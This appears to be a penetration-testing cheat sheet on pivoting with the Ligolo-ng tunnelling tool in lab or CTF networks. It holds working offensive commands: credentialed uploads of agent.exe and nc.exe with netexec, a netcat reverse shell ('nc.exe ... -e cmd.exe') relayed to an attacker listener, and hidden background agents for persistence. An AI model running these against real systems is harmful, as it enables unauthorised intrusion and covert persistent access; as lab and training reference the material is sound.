Ligolo-ng

Pivoting

Launch ligolo-proxy:

-selfcert for when the environment has no internet availability, e.g. CTFs/labs
-autocert for when there is internet available on the environment

When -autocert is used, port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval.

./proxy [-selfcert | -autocert] -laddr 0.0.0.0:443

Connect to the proxy from the target machine:

# When -selfcert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -ignore-cert -retry

# When -autocert is used on the proxy
./agent -connect 10.129.204.146:11601:443 -retry

The routing configuration can be done using the autoroute option or step by step following the rest of the tabs:

# Receive the agent connection
ligolo-ng » INFO[0052] Agent joined.   id=0050569e00f6 name="DOMAIN\x7331@MS01" remote="192.168.103.141:49318"

# List active sessions
ligolo-ng » session

# Choose the target session
? Specify a session : 1 - DOMAIN\x7331@MS01 - 192.168.103.141:49318 - 0050569e00f6

# Configure the routing options
[Agent : OSCP\eric.wallows@MS01] » autoroute

# Choose the target network
? Select routes to add: 10.10.63.141/24

# Create a new interface
? Create a new interface or use an existing one? Create a new interface
INFO[0105] Generating a random interface name...
INFO[0105] Using interface name savinglester
INFO[0105] Creating routes for savinglester...

# Start the tunnel via the newly-created interface
? Start the tunnel? Yes
INFO[0106] Starting tunnel to DOMAIN\x7331@MS01 (0050569e00f6)

Port-Forward

To access local ports on the connected agent, ligolo-ng uses a hardcoded "magic" CIDR: 240.0.0.0/4:

$ sudo ip route add 240.0.0.1/32 dev ligolo

Agent Transfer & Execution

We don't need elevated privileges on the target to use the ligolo-agent.

$ nxc smb 10.129.204.146 -u Administrator -p 'IpreferanewP@$$' --local-auth --put-file 'agent.exe' '\Windows\Temp\agent.exe'

Reverse Shell

We have a route to the target network, but the target network does not have a route to our attack host. Thus, if we want to catch a reverse shell from a target other than the pivot host:

Create a listener on the agent/pivot host (0.0.0.0:3000) that will redirect the traffic to our proxy/attack host (127.0.0.1:4444).

[Agent : pivot@pivot-machine] >> listener_add --addr 0.0.0.0:3000 --to 127.0.0.1:4444 --tcp
INFO[0373] Listener 0 created on remote agent!

Start listening from our attack host:

$ nc -lvnp 4444
listening on [any] 4444...

Transfer the binary to the target:

nxc mssql 10.10.63.148 -u sql_svc -p Dolphin1 --put-file 'nc.exe' 'c:\windows\temp\nc.exe'

Connect from the target to the pivot machine (10.10.63.147) on the listening port (30000):

$ nxc mssql 10.10.63.148 -u sql_svc -p Dolphin1 -x 'c:\windows\temp\nc.exe 10.10.63.147 3000 -e cmd.exe'

This will connect to the agent's listener and then forwarded to our proxy:

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.237] from (UNKNOWN) [192.168.45.237] 46144
...
C:\Windows\system32>whoami
nt service\mssql$sqlexpress

C:\Windows\system32>hostname
MS02

Persistence

# Linux targets
nohup /tmp/agent -connect 10.10.14.5:443 -ignore-cert > /dev/null 2>&1 &

# Windows targets
Start-Process -FilePath "C:\Windows\Temp\agent.exe" -ArgumentList "-connect 10.10.14.5:443 -ignore-cert" -WindowStyle Hidden

Resources

Introduction - Ligolo-ng Documentationdocs.ligolo.ng

PreviousPivoting Tools NextSshuttle

Last updated 4 months ago

Was this helpful?